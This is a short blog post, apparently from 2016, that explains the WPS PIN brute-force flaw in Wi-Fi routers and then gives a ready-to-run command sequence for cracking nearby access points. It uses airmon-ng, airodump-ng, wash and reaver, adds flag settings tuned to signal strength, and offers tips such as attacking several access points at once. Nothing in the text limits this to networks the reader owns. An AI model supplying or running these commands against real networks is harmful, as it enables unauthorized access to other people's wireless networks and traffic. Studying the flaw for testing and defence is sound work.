[Reaver] crack wireless AP

Author: Iam老J | Published: 2016-06-21 16:01 | Views: 40

    About WPS

    What WIKI says:

    Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

    Time cost calculation

    PIN code

    Have a try

    # 1) prerequisite
    airmon-ng check kill
    
    
    # 2) gather information
    # Set your wireless interface in monitor mode
    airmon-ng start wlan0
    
    # list all APs in range (optional, mostly to get the gain value)
    airodump-ng wlan0mon
    
    # list APs that have WPS enabled
    wash -i wlan0mon -C
    
    
    # 3) let's reaver
    # -b takes the AP's BSSID (its MAC address)
    # -c needs a channel number
    reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -c 1
    
    
    # optional choices
    # signal is good
    reaver -i wlan0mon -b MAC -a -S -vv -d0 -c 1
    # signal is so-so
    reaver -i wlan0mon -b MAC -a -S -vv -d2 -t 5 -c 1
    # signal is poor
    reaver -i wlan0mon -b MAC -a -S -vv -d5 -c 1
    

    Notice

    • Something is wrong with the wireless card. I use a TPLINK WN722N adapter. Sometimes it stops cracking (not working), and unplugging and replugging it is required.
    • Pick the AP which has a HIGH gain value and make sure the AP has WPS enabled.
    • The AP is very choosy and won't let you associate.
    • Try cracking more than one AP at a time.
